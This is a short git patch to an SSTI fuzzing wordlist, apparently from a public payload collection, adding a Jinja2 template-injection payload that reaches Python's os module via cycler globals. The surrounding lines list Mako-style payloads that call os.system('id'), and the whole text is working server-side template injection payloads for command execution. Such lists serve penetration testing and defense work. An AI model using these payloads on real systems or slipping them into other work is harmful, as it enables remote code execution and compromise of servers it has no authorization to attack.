From 8482f742ffdc7d3185a9a96a7e95fb6acba03bdd Mon Sep 17 00:00:00 2001 From: p0dalirius Date: Mon, 4 Oct 2021 09:21:10 +0200 Subject: [PATCH] Update ssti.fuzz --- Server Side Template Injection/Intruder/ssti.fuzz | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 03df55d..ab8269c 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -100,3 +100,4 @@ ${self.context._with_template.module.filters.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} +{{self._TemplateReference__context.cycler.__init__.__globals__.os}}